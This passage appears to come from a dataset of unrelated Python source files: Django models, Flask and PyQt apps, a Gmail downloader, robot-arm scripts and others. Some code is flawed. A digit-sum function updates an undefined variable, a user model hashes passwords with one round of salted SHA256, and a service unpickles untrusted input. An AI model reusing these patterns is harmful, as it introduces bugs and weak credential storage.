 else: return cons(s_eval(car(m), a), evlis(cdr(m), a))
# REP (no Loop): s_rep
def s_rep(e):
 """Read-eval-print one expression in an empty environment."""
 return s_string(s_eval(s_read(e), s_read("()")))
|
10,509 | 6de1d5233eb8dccaa746de84c3f4edeed98c0dfb | def calc(num):
lst = []
while num > 0:
lst.append(num % 10)
n //= 10
return sum(lst)
# Read one integer from stdin and print its digit sum.
N = int(input())
print(calc(N))
10,510 | 4886fad8e437b0ebb5d574ed9c63f7f0df5a2308 | from django.db import models
from hashlib import sha256
from django.contrib.auth.base_user import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin, UserManager
from django.utils.crypto import get_random_string, constant_time_compare
import re
class Avatar(models.Model):
 # Avatar image stored both as an external link and an uploaded file.
 link = models.TextField('Ссылка')
 file = models.ImageField('Файл')
class Pictures(models.Model):
 # User gallery picture; deleted together with its owner (CASCADE).
 link = models.TextField('Ссылка')
 file = models.ImageField('Файл')
 user_id = models.ForeignKey('users.User', null=True, on_delete=models.CASCADE)
class User(AbstractBaseUser, PermissionsMixin):
 """Custom user model authenticated by e-mail, with a hand-rolled
 salted-SHA256 password scheme replacing Django's default hashers.

 NOTE(review): a custom hash scheme bypasses Django's iterated/keyed
 hashers (PBKDF2 etc.) — confirm this is deliberate.
 """
 first_name = models.CharField('Имя', max_length=50)
 last_name = models.CharField('Фамилия', max_length=50)
 birth_date = models.DateField('Дата рождения', null=True)
 sex = models.CharField(max_length=1, choices=(('M', 'Male'), ('F', 'Female')))
 email = models.CharField('Электронная почта', max_length=64, null=True, default=None, blank=True, unique=True)
 password = models.CharField(max_length=64)
 salt = models.CharField(max_length=64)
 USERNAME_FIELD = 'email'
 EMAIL_FIELD = 'email'
 objects = UserManager()
 def set_password(self, raw_password):
  # Store SHA256(raw_password + '_' + fresh 64-char salt); returns self
  # so calls can be chained (does not save the model).
  salt = get_random_string(64)
  hasher = sha256()
  raw_password = raw_password + '_' + salt
  hasher.update(raw_password.encode('utf-8'))
  self.salt = salt
  self.password = hasher.hexdigest()
  return self
 def check_password(self, raw_password):
  # Recompute the salted hash and compare in constant time to avoid
  # timing side channels.
  hasher = sha256()
  raw_password = raw_password + '_' + self.salt
  hasher.update(raw_password.encode('utf-8'))
  result = constant_time_compare(hasher.hexdigest(), self.password)
  return result
|
10,511 | adc654a69bf068cd24fadd53e22160463f10a018 | '''
5. Working with Files and Directories
Creating files
Operations on files (open, close, read, write)
file object attributes
filepositions
- https://docs.python.org/3/tutorial/inputoutput.html#reading-and-writing-files
Listing Files in a Directory
>>> import os
>>> print(os.listdir("C:/Users/Quark/Documents/shuffler"))
https://docs.python.org/3/library/os.html
Testing File Types
- We can use endswith to test this out.
Removing Files and Directories
- os.remove() or os.unlink()
- os.rmdir(): Removes the specified directory. The directory must be empty or Python will display an exception message.
- shutil.rmtree(): Removes the specified directory, all subdirectories, and all files. This function is especially dangerous because it removes everything without checking (Python assumes that you know what you’re doing). As a result, you can easily lose data using this function.
Copying and Renaming Files
- https://docs.python.org/3/library/shutil.html
- https://docs.python.org/3/library/os.html
Splitting Pathnames
- https://docs.python.org/3/library/stdtypes.html#str.split
- https://docs.python.org/3/library/os.path.html
Creating and Moving to Directories
- https://stackabuse.com/creating-and-deleting-directories-with-python/
Traversing Directory Trees
- https://www.pythoncentral.io/how-to-traverse-a-directory-tree-in-python-guide-to-os-walk/
''' |
10,512 | e0a6d8a0833920011cc737b405cdaac9ea90e7b0 | """This REST service allows real-time curation and belief updates for
a corpus of INDRA Statements."""
import sys
import pickle
import logging
import argparse
from flask import Flask, request, jsonify, abort, Response
from indra.belief import wm_scorer, BeliefEngine
from indra.statements import stmts_from_json_file
logger = logging.getLogger('live_curation')
app = Flask(__name__)
scorer = wm_scorer.get_eidos_bayesian_scorer()
corpora = {}
class Corpus(object):
    """A corpus of INDRA Statements indexed by UUID, plus their curations."""

    def __init__(self, statements):
        # Index by UUID for O(1) lookup when curations arrive.
        self.statements = {stmt.uuid: stmt for stmt in statements}
        self.curations = {}

    def __str__(self):
        return 'Corpus(%s -> %s)' % (str(self.statements), str(self.curations))

    def __repr__(self):
        return str(self)
@app.route('/update_beliefs', methods=['POST'])
def update_beliefs():
 """Apply a batch of curations to a corpus and optionally return beliefs.

 JSON body: corpus_id (required), curations ({uuid: bool}), return_beliefs.
 Responds 415 without a JSON body, 400 for an unknown corpus_id; otherwise
 returns {} or {uuid: belief} depending on return_beliefs.
 """
 if request.json is None:
  abort(Response('Missing application/json header.', 415))
 # Get input parameters
 corpus_id = request.json.get('corpus_id')
 curations = request.json.get('curations', {})
 return_beliefs = request.json.get('return_beliefs', False)
 # Get the right corpus
 try:
  corpus = corpora[corpus_id]
 except KeyError:
  abort(Response('The corpus_id "%s" is unknown.' % corpus_id, 400))
  return
 # Start tabulating the curation counts
 # Counts are [correct, incorrect] per source (and per extraction rule).
 prior_counts = {}
 subtype_counts = {}
 # Take each curation from the input
 for uuid, correct in curations.items():
  # Save the curation in the corpus
  # TODO: handle already existing curation
  stmt = corpus.statements.get(uuid)
  if stmt is None:
   logger.warning('%s is not in the corpus.' % uuid)
   continue
  corpus.curations[uuid] = correct
  # Now take all the evidences of the statement and assume that
  # they follow the correctness of the curation and contribute to
  # counts for their sources
  for ev in stmt.evidence:
   # Make the index in the curation count list
   idx = 0 if correct else 1
   extraction_rule = ev.annotations.get('found_by')
   # If there is no extraction rule then we just score the source
   if not extraction_rule:
    try:
     prior_counts[ev.source_api][idx] += 1
    except KeyError:
     # First sighting of this source: initialize then count.
     prior_counts[ev.source_api] = [0, 0]
     prior_counts[ev.source_api][idx] += 1
    # Otherwise we score the specific extraction rule
   else:
    try:
     subtype_counts[ev.source_api][extraction_rule][idx] += 1
    except KeyError:
     if ev.source_api not in subtype_counts:
      subtype_counts[ev.source_api] = {}
     subtype_counts[ev.source_api][extraction_rule] = [0, 0]
     subtype_counts[ev.source_api][extraction_rule][idx] += 1
 # Finally, we update the scorer with the new curation counts
 scorer.update_counts(prior_counts, subtype_counts)
 # If not belief return is needed, we just stop here
 if not return_beliefs:
  return jsonify({})
 # Otherwise we rerun the belief calculation on the corpus with
 # the updated scorer and return a dict of beliefs
 else:
  be = BeliefEngine(scorer)
  stmts = list(corpus.statements.values())
  be.set_prior_probs(stmts)
  # Here we set beliefs based on actual curation
  for uuid, correct in corpus.curations.items():
   stmt = corpus.statements.get(uuid)
   if stmt is None:
    logger.warning('%s is not in the corpus.' % uuid)
    continue
   stmt.belief = correct
  belief_dict = {st.uuid: st.belief for st in stmts}
  return jsonify(belief_dict)
if __name__ == '__main__':
 # Process arguments
 parser = argparse.ArgumentParser(description='Choose a corpus for live curation.')
 parser.add_argument('--json')
 parser.add_argument('--pickle')
 parser.add_argument('--corpus_id', default='1')
 parser.add_argument('--host', default='0.0.0.0')
 parser.add_argument('--port', default=8001, type=int)
 args = parser.parse_args()
 # Load the corpus
 # NOTE(review): if neither --json nor --pickle is given, `stmts` is never
 # bound and the logger call below raises NameError — confirm intended.
 if args.json:
  stmts = stmts_from_json_file(args.json)
 elif args.pickle:
  # SECURITY: pickle.load executes arbitrary code from the file — only
  # load pickles from trusted sources.
  with open(args.pickle, 'rb') as fh:
   stmts = pickle.load(fh)
 logger.info('Loaded corpus %s with %d statements.' %
    (args.corpus_id, len(stmts)))
 corpora[args.corpus_id] = Corpus(stmts)
 # Run the app
 app.run(host=args.host, port=args.port)
|
10,513 | 5d36c28db1c5c78d4ec395672f0140cfc8062c10 | from PyQt5 import QtWidgets, QtGui, QtCore, QtPrintSupport
from ventana import *
from vensalir import *
from vencalendar import *
from datetime import datetime, date
import sys, var, events, clients, conexion, printer, Products, ventas, provider
class DialogSalir(QtWidgets.QDialog):
 """
 Dialog that instantiates the exit-confirmation window; its Yes button
 triggers the application's exit handler.
 """
 def __init__(self):
  super(DialogSalir, self).__init__()
  var.dlgsalir= Ui_dlgsalir()
  var.dlgsalir.setupUi(self)
  # Only the Yes button is wired; No simply closes the dialog.
  var.dlgsalir.btnBoxSalir.button(QtWidgets.QDialogButtonBox.Yes).clicked.connect(events.Eventos.Salir)
class DialogCalendar(QtWidgets.QDialog):
 """
 Dialog that instantiates the calendar-picker window, pre-selected on
 today's date.
 """
 def __init__(self):
  super(DialogCalendar, self).__init__()
  var.dlgcalendar = Ui_dlgCalendar()
  var.dlgcalendar.setupUi(self)
  # Pre-select today's date in the calendar widget.
  diaactual = datetime.now().day
  mesactual = datetime.now().month
  anoactual = datetime.now().year
  var.dlgcalendar.Calendar.setSelectedDate((QtCore.QDate(anoactual,mesactual,diaactual)))
  # One click feeds the chosen date to both the clients and sales forms.
  var.dlgcalendar.Calendar.clicked.connect(clients.Clientes.cargarFecha)
  var.dlgcalendar.Calendar.clicked.connect(ventas.Ventas.cargarFecha)
class FileDialogAbrir(QtWidgets.QFileDialog):
 """
 Modal file-open dialog used to browse directories and pick a file.
 """
 def __init__(self):
  super(FileDialogAbrir, self).__init__()
  self.setWindowTitle('Abrir Archivo')
  self.setModal(True)
class PrintDialogAbrir(QtPrintSupport.QPrintDialog):
 """
 Dialog that instantiates the system print window (default Qt behaviour;
 no customization beyond the subclass).
 """
 def __init__(self):
  super(PrintDialogAbrir, self).__init__()
class Main(QtWidgets.QMainWindow):
    """
    Main application window.

    Instantiates every auxiliary dialog, wires all widget signals
    (buttons, tables, toolbar, menubar) to their handlers and, on
    startup, connects to the database and fills the client, product
    and invoice views.
    """

    def __init__(self):
        super(Main, self).__init__()
        # Main UI plus the auxiliary dialogs.
        var.ui = Ui_venPrincipal()
        var.ui.setupUi(self)
        var.dlgsalir = DialogSalir()
        var.dlgcalendar = DialogCalendar()
        var.filedlgabrir = FileDialogAbrir()
        var.dlgImprimir = PrintDialogAbrir()
        # Widget groups: sex radio buttons and payment checkboxes.
        var.rbtsex = (var.ui.rbtFem, var.ui.rbtMasc)
        var.chkpago = (var.ui.chkEfec, var.ui.chkTar, var.ui.chkTrans)
        clients.Clientes.valoresSpin()
        var.ui.editDni.editingFinished.connect(clients.Clientes.validoDni)
        var.ui.cmbProv.activated[str].connect(clients.Clientes.selProv)
        for i in var.rbtsex:
            i.toggled.connect(clients.Clientes.selSexo)
        for i in var.chkpago:
            i.stateChanged.connect(clients.Clientes.selPago)
        events.Eventos.cargarProv(self)
        # Client-form and product-form buttons.
        var.ui.btnSalir.clicked.connect(events.Eventos.Salir)
        var.ui.btnCalendar.clicked.connect(clients.Clientes.abrirCalendar)
        var.ui.btnAltaCli.clicked.connect(clients.Clientes.altaCliente)
        var.ui.btnLimpiarCli.clicked.connect(clients.Clientes.limpiarCli)
        var.ui.btnBajaCli.clicked.connect(clients.Clientes.bajaCliente)
        var.ui.btnModifCli.clicked.connect(clients.Clientes.modifCliente)
        var.ui.btnReloadCli.clicked.connect(clients.Clientes.reloadCli)
        var.ui.btnBuscarCli.clicked.connect(clients.Clientes.buscarCli)
        var.ui.btnAltaProd.clicked.connect(Products.Products.altaProducto)
        var.ui.btnLimpiarProd.clicked.connect(Products.Products.limpiarProd)
        var.ui.btnBajaProd.clicked.connect(Products.Products.BajaProd)
        var.ui.btnModifProd.clicked.connect(Products.Products.ModificarProd)
        var.ui.btnSalirProd.clicked.connect(events.Eventos.Salir)
        var.ui.btnCalendario.clicked.connect(clients.Clientes.abrirCalendar)
        var.ui.btnFacturar.clicked.connect(ventas.Ventas.altafactura)
        var.ui.btnAnular.clicked.connect(ventas.Ventas.BajaFactura)
        var.ui.btnRefresh.clicked.connect(ventas.Ventas.reloadFact)
        var.ui.btnBuscarFact.clicked.connect(ventas.Ventas.buscarfacClientes)
        var.ui.btnAceptarventa.clicked.connect(ventas.Ventas.venta)
        var.ui.btnCancelar.clicked.connect(ventas.Ventas.BajaVenta)
        var.ui.BtnControlStock.clicked.connect(Products.Products.ControlStock)
        var.ui.BtnReloadProd.clicked.connect(conexion.Conexion.mostrarProducts)
        var.ui.BtnDescuento.clicked.connect(ventas.Ventas.Descuento)
        # Provider buttons and table.
        var.ui.btnAltaProv.clicked.connect(provider.Provider.altaProveedor)
        var.ui.TableProveedores.clicked.connect(provider.Provider.cargarProd)
        var.ui.TableProveedores.setSelectionBehavior(QtWidgets.QTableWidget.SelectRows)
        var.ui.btnSalirProv.clicked.connect(events.Eventos.Salir)
        conexion.Conexion.mostrarProvedrores()
        var.ui.btnBajaPrd.clicked.connect(provider.Provider.BajaProv)
        # NOTE(review): btnModifCli is already connected to the client modify
        # handler above; confirm both slots are really meant to fire.
        var.ui.btnModifCli.clicked.connect(provider.Provider.ModificarProd)
        var.ui.btnProv.clicked.connect(provider.Provider.limpiarProv)
        # Client, product and invoicing tables.
        var.ui.tableCli.clicked.connect(clients.Clientes.cargarCli)
        var.ui.tableCli.setSelectionBehavior(QtWidgets.QTableWidget.SelectRows)
        var.ui.tableProd.clicked.connect(Products.Products.cargarProd)
        var.ui.tableProd.setSelectionBehavior(QtWidgets.QTableWidget.SelectRows)
        var.ui.tableFechaFact.clicked.connect(ventas.Ventas.cargarFactura)
        # Fix: setSelectionBehavior on tableFechaFact was called twice; once is enough.
        var.ui.tableFechaFact.setSelectionBehavior(QtWidgets.QTableWidget.SelectRows)
        var.ui.tabFact.setSelectionBehavior(QtWidgets.QTableWidget.SelectRows)
        var.ui.tableFechaFact.clicked.connect(ventas.Ventas.mostrarVentas)
        # Toolbar and menubar actions.
        var.ui.ToolbarSalir.triggered.connect(events.Eventos.Salir)
        var.ui.ToolBarBackup.triggered.connect(events.Eventos.Backup)
        var.ui.ToolBarAbrirDir.triggered.connect(events.Eventos.AbrirDir)
        var.ui.ToolBarPrinter.triggered.connect(events.Eventos.AbrirPrinter)
        var.ui.ToollBarRecBackup.triggered.connect(events.Eventos.restaurarBD)
        var.ui.actionSalir.triggered.connect(events.Eventos.Salir)
        var.ui.actionImportar_Datos.triggered.connect(events.Eventos.ImportarDatos)
        # Status bar widgets: welcome message and current date.
        var.ui.statusBar.addPermanentWidget(var.ui.lblstatus, 1)
        var.ui.statusBar.addPermanentWidget(var.ui.lblstatusdate, 2)
        var.ui.lblstatus.setStyleSheet('QLabel {color: red; font: bold;}')
        var.ui.lblstatus.setText('Bienvenido a 2º DAM')
        fecha = date.today()
        var.ui.lblstatusdate.setStyleSheet('QLabel {color: black; font: bold;}')
        var.ui.lblstatusdate.setText(fecha.strftime('%A %d de %B del %Y'))
        # Fix: removed a stray connect that hooked btnBajaCli ("delete client")
        # to Products.altaProducto — deleting a client no longer also creates
        # a product.
        # Report printing.
        var.ui.menubarReportCli.triggered.connect(printer.Printer.reportCli)
        var.ui.MenubarReportProd.triggered.connect(printer.Printer.reportProduc)
        var.ui.MenuBarReportFac.triggered.connect(printer.Printer.reportFac)
        var.ui.actionListado_Proveedores.triggered.connect(printer.Printer.ReportProvedorees)
        # Database connection and initial data load.
        conexion.Conexion.db_connect(var.filebd)
        conexion.Conexion.mostrarClientes()
        conexion.Conexion.mostrarProducts()
        conexion.Conexion.mostrarFacturas()
        var.ui.TabWidget.setCurrentIndex(0)

    def closeEvent(self, event):
        """Route the window-close event through the application's exit handler."""
        if event:
            events.Eventos.Salir(event)
if __name__ == '__main__':
    # Application entry point: create the Qt app, show the main window
    # maximized and hand control to the Qt event loop.
    app = QtWidgets.QApplication([])
    window = Main()
    window.showMaximized()
    sys.exit(app.exec())
|
10,514 | 8172ce93f6d8609e51259a6cc10752e04ba9159f | #!/usr/bin/python2
from __future__ import print_function
import httplib2
import oauth2client # $ pip install google-api-python-client
import os
import base64
import time
import email
from googleapiclient import discovery
from oauth2client import client
from oauth2client import tools
from oauth2client import file
from googleapiclient import errors
UPDATE_INTERVAL = 5 # seconds
NEW_LABEL_ID = None # Gmail label ID of 'new' label
# Command line arguments.
try:
    import argparse
    parser = argparse.ArgumentParser(parents=[tools.argparser])
    # NOTE(review): default='false' is the *string* 'false', not the boolean
    # False; the rest of the script relies on this exact value (the
    # "== 'false'" comparison in main), so changing it to False alone would
    # alter behaviour — confirm before normalising.
    parser.add_argument('-a', '--all', action='store_true', dest='download_all', default='false', help='Download all attachments (else only download new)')
    parser.add_argument('-l', '--label', required=True, help='Gmail label to use after attachment is downloaded (or label to download attachments from if --all is used)')
    parser.add_argument('-d', '--directory', default='.', help='Specify parent directory in which download directory will be created')
    flags = parser.parse_args()
except ImportError:
    flags = None
SCOPES = 'https://www.googleapis.com/auth/gmail.modify'
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'Packet Downloader'
# Gmail authentication
def get_credentials():
    """Return valid OAuth2 credentials for the Gmail API.

    Loads cached credentials from ./.credentials/credentials.json; if none
    exist (or they are invalid) runs the OAuth2 flow from
    CLIENT_SECRET_FILE and stores the result for next time.
    """
    # home_dir = os.path.expanduser('~')
    # credential_dir = os.path.join(home_dir, '.credentials')
    credential_dir = './.credentials'
    if not os.path.exists(credential_dir):
        os.makedirs(credential_dir)
    credential_path = os.path.join(credential_dir, 'credentials.json')
    store = oauth2client.file.Storage(credential_path)
    credentials = store.get()
    if not credentials or credentials.invalid:
        flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
        flow.user_agent = APPLICATION_NAME
        if flags:
            credentials = tools.run_flow(flow, store, flags)
        else:  # Needed only for compatibility with Python 2.6
            credentials = tools.run(flow, store)
        print('Storing credentials to ' + credential_path)
    return credentials
# Gmail advanced search
def ListMessagesMatchingQuery(service, user_id, query=''):
    """Return all message stubs matching a Gmail search *query*.

    Follows nextPageToken pagination until every page is fetched.
    Returns None (implicitly) if the API call raises an HttpError.
    """
    try:
        response = service.users().messages().list(userId=user_id, q=query).execute()
        messages = []
        if 'messages' in response:
            messages.extend(response['messages'])
        while 'nextPageToken' in response:
            page_token = response['nextPageToken']
            response = service.users().messages().list(userId=user_id, q=query, pageToken=page_token).execute()
            messages.extend(response['messages'])
        return messages
    except errors.HttpError, error:  # Python 2 except syntax (whole file is py2)
        print('An error occurred: %s' % error)
# Download message body and attachment
def GetData(service, user_id, msg_id, prefix=""):
    """Download one message's .sbd attachment and its plain-text body.

    The attachment is saved as <prefix>/sbd/new/<internalDate>.sbd and its
    contents appended to <prefix>/packets.csv; the text body is saved under
    <prefix>/txt/. Files that already exist on disk are skipped.
    """
    sbd_filename = ''
    csv_filename = 'packets.csv'
    try:
        message = service.users().messages().get(userId=user_id, id=msg_id).execute()
        for part in message['payload']['parts']:
            if part['filename']:
                # Name the download after the message timestamp rather than
                # the original attachment name.
                sbd_filename = message['internalDate'] + '.sbd'
                if not sbd_filename is '':
                    # Small attachments arrive inline under 'data'; larger
                    # ones must be fetched separately via their attachmentId.
                    if 'data' in part['body']:
                        data=part['body']['data']
                    else:
                        att_id=part['body']['attachmentId']
                        att=service.users().messages().attachments().get(userId=user_id, messageId=msg_id,id=att_id).execute()
                        data=att['data']
                    file_data = base64.urlsafe_b64decode(data.encode('UTF-8'))
                    sbd_dl_path = os.path.join(prefix, 'sbd', 'new', sbd_filename)
                    csv_dl_path = os.path.join(prefix, csv_filename)
                    # Skip if already downloaded to either sbd/new/ or sbd/.
                    if not os.path.exists(sbd_dl_path) and not os.path.exists(os.path.join(prefix, 'sbd', sbd_filename)):
                        # download individual sbd
                        with open(sbd_dl_path, 'w') as f:
                            f.write(file_data)
                            f.close()
                        # append contents to packets.csv
                        with open(csv_dl_path, 'a') as f:
                            f.write(file_data + '\n')
                            f.close()
                        record('Downloaded ' + sbd_dl_path)
                    else:
                        record('Skipped ' + sbd_dl_path)
    except errors.HttpError, error:  # Python 2 except syntax
        print('An error occurred: %s' % error)
    try:
        # Second pass: fetch the raw RFC822 message and extract the plain
        # text body. Only runs when an attachment was found above.
        if not sbd_filename is '':
            message = service.users().messages().get(userId=user_id, id=msg_id, format='raw').execute()
            txt_file = sbd_filename[:-3] + 'txt'
            txt_path = os.path.join(prefix, 'txt', txt_file)
            if message['raw']:
                if not os.path.exists(txt_path):
                    data=message['raw']
                    file_data = base64.urlsafe_b64decode(data.encode('UTF-8'))
                    msg = email.message_from_string(file_data)
                    # Last text/plain part wins if there are several.
                    for part in msg.walk():
                        if part.get_content_type() == 'text/plain':
                            msg_txt = part.get_payload()
                    with open(txt_path, 'w') as f:
                        f.write(msg_txt)
                        f.close()
                    record('Downloaded ' + txt_path)
                else:
                    record('Skipped ' + txt_path)
    except errors.HttpError, error:  # Python 2 except syntax
        print('An error occurred: %s' % error)
# create label object
def CreateLabel(service, user_id, label_object):
    """Create a Gmail label from *label_object* and return the API response."""
    try:
        label = service.users().labels().create(userId=user_id, body=label_object).execute()
        return label
    except errors.HttpError, error:  # Python 2 except syntax
        print('An error occurred: %s' % error)
# Build the request body describing a Gmail label.
def MakeLabel(label_name, mlv='show', llv='labelShow'):
    """Return the dict payload for creating a label called *label_name*."""
    return {
        'name': label_name,
        'messageListVisibility': mlv,
        'labelListVisibility': llv,
    }
# add/remove labels from email
def ModifyMessage(service, user_id, msg_id, msg_labels):
    """Apply *msg_labels* (add/remove label ids) to a message; return the message."""
    try:
        message = service.users().messages().modify(userId=user_id, id=msg_id, body=msg_labels).execute()
        label_ids = message['labelIds']  # NOTE(review): unused local — confirm intent
        return message
    except errors.HttpError, error:  # Python 2 except syntax
        print('An error occurred: %s' % error)
# Build the modify-message body swapping the 'new' label for the final one.
def CreateMsgLabels(new_label_id, label_id):
    """Return a payload that removes *new_label_id* and adds *label_id*."""
    payload = {'removeLabelIds': [new_label_id]}
    payload['addLabelIds'] = [label_id]
    return payload
# use to find label ID of 'new' label (only used on initial run for each new Gmail account)
def ListLabels(service, user_id):
    """Return the list of the account's Gmail labels (dicts with 'name'/'id')."""
    try:
        response = service.users().labels().list(userId=user_id).execute()
        labels = response['labels']
        return labels
    except errors.HttpError, error:  # Python 2 except syntax
        print('An error occurred: %s' % error)
# log data and print to screen
def record(text):
    """Append a timestamped *text* line to the run's log.txt and echo it."""
    localtime = time.asctime(time.localtime(time.time()))
    # Log file lives in <directory>/<label>/log.txt (created in main()).
    log_path = os.path.join(flags.directory, flags.label, 'log.txt')
    with open(log_path, 'a') as log:
        log.write(localtime + '\t' + text + '\n')
        log.close()
    print(localtime + '\t' + text)
def main():
    """Poll Gmail and download .sbd attachments plus message bodies.

    With --all, repeatedly downloads every attachment under --label.
    Otherwise downloads messages labelled 'new' and then relabels them
    with --label so they are not fetched again. Loops forever, sleeping
    UPDATE_INTERVAL seconds between polls.
    """
    # Gmail authentication
    credentials = get_credentials()
    http = credentials.authorize(httplib2.Http())
    service = discovery.build('gmail', 'v1', http=http)
    check = True
    label_exists = False
    # argparse stores the *string* 'false' as the default and the boolean
    # True when -a/--all is given; normalise to a real boolean once.
    download_all = flags.download_all is True
    # Fix: assign a local instead of rebinding the module constant
    # NEW_LABEL_ID — the original assignment made every later read of
    # NEW_LABEL_ID an unbound local when no 'new' label existed.
    new_label_id = NEW_LABEL_ID
    # Retrieve the account's labels; find the target label and 'new'.
    labels = ListLabels(service, 'me')
    for label in labels:
        if label['name'] == flags.label:
            label_id = label['id']
            label_exists = True
        elif label['name'] == 'new':
            new_label_id = label['id']
    # Fix: '==' rather than 'is' — identity comparison of string literals
    # only worked by CPython interning accident.
    if flags.directory == '.':
        dir_path = os.path.join(os.getcwd(), flags.label)
    else:
        dir_path = os.path.join(flags.directory, flags.label)
    # Create the download directories and log file when needed.
    if label_exists is True or not download_all:
        if not os.path.exists(dir_path):
            os.makedirs(dir_path)
            record('Created directory ' + dir_path)
        log_path = os.path.join(dir_path, 'log.txt')
        if not os.path.exists(log_path):
            open(log_path, 'w').close()
        sbd_path = os.path.join(dir_path, 'sbd')
        if not os.path.exists(sbd_path):
            os.makedirs(sbd_path)
            record('Created directory ' + sbd_path)
        sbd_dl_path = os.path.join(sbd_path, 'new')
        if not os.path.exists(sbd_dl_path):
            os.makedirs(sbd_dl_path)
            record('Created directory ' + sbd_dl_path)
        txt_path = os.path.join(dir_path, 'txt')
        if not os.path.exists(txt_path):
            os.makedirs(txt_path)
            record('Created directory ' + txt_path)
    while check is True:
        if download_all:
            # Download every packet carrying the requested label.
            if label_exists is True:
                messages = ListMessagesMatchingQuery(service, 'me', 'label:' + flags.label)
                if not messages:
                    record('No messages found.')
                else:
                    for message in messages:
                        GetData(service, 'me', message['id'], dir_path)
            else:
                localtime = time.asctime(time.localtime(time.time()))
                print(localtime + '\tLabel \'' + flags.label + '\' does not exist.')
                check = False
        else:
            # Download everything labelled 'new', then relabel it.
            messages = ListMessagesMatchingQuery(service, 'me', 'label:new')
            if not messages:
                record('No messages found.')
            else:
                if label_exists is False:
                    record('Creating label ' + flags.label)
                    label_object = MakeLabel(flags.label, mlv='show', llv='labelShow')
                    label = CreateLabel(service, 'me', label_object)
                    label_id = label['id']
                    label_exists = True
                for message in messages:
                    GetData(service, 'me', message['id'], dir_path)
                    msg_label = CreateMsgLabels(new_label_id, label_id)
                    ModifyMessage(service, 'me', message['id'], msg_label)
        if check is True:
            time.sleep(UPDATE_INTERVAL)


if __name__ == '__main__':
    main()
|
10,515 | d0ed4bfa75db659d8f3095185b1f2c2ab3c668ec | import pygame
white = ( 255, 255, 255)
black = ( 0, 0, 0)
class Car(pygame.sprite.Sprite):
    """A simple 75x25 white rectangular car sprite."""

    def __init__(self):
        super(Car, self).__init__()
        surface = pygame.Surface((75, 25))
        surface.fill(white)
        self.surf = surface
        self.rect = surface.get_rect()
10,516 | 07eb4bbdf0943bd5e83afc487d1930d0bc143ab6 | # Generated by Django 2.1.4 on 2019-02-23 09:34
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration creating the Station table."""

    dependencies = [
        ('app', '0008_auto_20190223_1127'),
    ]

    operations = [
        migrations.CreateModel(
            name='Station',
            fields=[
                # station_id doubles as the primary key.
                ('station_id', models.IntegerField(primary_key=True, serialize=False)),
                ('station_name', models.CharField(max_length=20)),
                ('address', models.CharField(max_length=100)),
                ('city', models.CharField(max_length=20)),
                ('district', models.CharField(max_length=20)),
                ('contact_no', models.IntegerField()),
            ],
        ),
    ]
|
10,517 | a6f895fb1596fe8a62362f3337cf4e52b2fe4349 | import rospy
import baxter_interface
from baxter_interface import Gripper, Limb, Head
import time
# Initialise the ROS node and handles for Baxter's limbs, left gripper and head.
rospy.init_node('test')
left = Limb('left')
right = Limb('right')
leftg = Gripper('left')
head = Head()
def dab():
    """Make Baxter 'dab': arms to neutral, strike the pose, nod, return to neutral."""
    right.move_to_neutral()
    left.move_to_neutral()
    # Joint-angle targets (radians) for each arm in the dab pose.
    dableft = {'left_w0': -0.10316020798529407, 'left_w1': 0.0790000105760988, 'left_w2': -0.0011504855909140602,
               'left_e0': -0.006519418348513008, 'left_e1': -0.039883500485020755,
               'left_s0': 0.29682528245582757, 'left_s1': -0.6181942575178218}
    dabright = {'right_s0': 0.6810874698211237, 'right_s1': -0.4935583185021319,
                'right_w0': -0.008820389530341128, 'right_w1': 0.3321068405771921, 'right_w2': 0.0038349519697135344,
                'right_e0': 1.749121593386343, 'right_e1': 1.6333060439009943}
    # Left arm first (face tucked into elbow), pan head, then extend right arm.
    left.move_to_joint_positions(dableft, timeout = 2)
    head.set_pan(-0.8, speed=.5)
    right.move_to_joint_positions(dabright, timeout = 6)
    head.command_nod()
    time.sleep(1)
    right.move_to_neutral()
    left.move_to_neutral()
def pickUp3Point2():
    """Pick up an object at position 3.2 with the left gripper, then release it."""
    # Joint targets (radians): hover above the object, and the grasp position.
    above3point2 = {'left_w0': 0.0, 'left_w1': 1.3157720208087136, 'left_w2': -0.002684466378799474,
                    'left_e0': 0, 'left_e1': 0.7850146682003605,
                    'left_s0': -0.73, 'left_s1': -0.6293156182299909}
    down3point2 = {'left_w0': 0.13077186216723152, 'left_w1': 1.1, 'left_w2': 0.0015339807878854137,
                   'left_e0': -0.16605342028859604, 'left_e1': 0.7,
                   'left_s0': -0.62, 'left_s1': -0.28}
    # Calibrate and open the gripper before approaching.
    Gripper.calibrate(leftg)
    leftg.open()
    time.sleep(1)
    left.move_to_joint_positions(above3point2, timeout = 4)
    left.move_to_joint_positions(down3point2, timeout = 4)
    leftg.open()
    leftg.close()
    time.sleep(1)
    # Lift, then release and recentre the head.
    left.move_to_joint_positions(above3point2)
    leftg.open()
    head.set_pan(0, speed=100)

# Demo sequence: grab the object at 3.2, then dab.
pickUp3Point2()
dab()
|
10,518 | a1a99120403fe53a10c8575af0c5951fa56849dd | #
# Script to send outgoing notifications
#
from django.core.management.base import BaseCommand, CommandError
from django.utils import timezone
from django.db import connection
from datetime import timedelta
import sys
from postgresqleu.util.messaging import ProviderCache
from postgresqleu.util.messaging.sender import send_pending_messages
from postgresqleu.confreg.models import NotificationQueue
class Command(BaseCommand):
    """Management command that sends all pending notification messages."""
    help = 'Send pending notifications'

    class ScheduledJob:
        # How often the scheduler should consider running this command.
        scheduled_interval = timedelta(minutes=10)

        @classmethod
        def should_run(cls):
            # Fix: the first argument of a classmethod is conventionally
            # named cls, not self (callers are unaffected).
            return NotificationQueue.objects.filter(time__lte=timezone.now()).exists()

    def handle(self, *args, **options):
        """Send pending messages under a Postgres advisory lock so that two
        senders never run concurrently; exit non-zero if sending failed."""
        curs = connection.cursor()
        curs.execute("SELECT pg_try_advisory_lock(931779)")
        if not curs.fetchall()[0][0]:
            raise CommandError("Failed to get advisory lock, existing send_notifications process stuck?")
        providers = ProviderCache()
        ok, numsent = send_pending_messages(providers)
        if numsent:
            print("Sent {} notification messages".format(numsent))
        if not ok:
            sys.exit(1)
|
10,519 | 66803f7384ae7cda3fc32213e0f0dc1311398427 | from django.test import TestCase
from .models import (TimelineSlide)
import json
# Test data shared by the TimelineSlide assertions below.
test_data_headline = 'Milk Marketing Board established'
test_data_text = 'The Milk Marketing Board (MMB) was a producer-led ' \
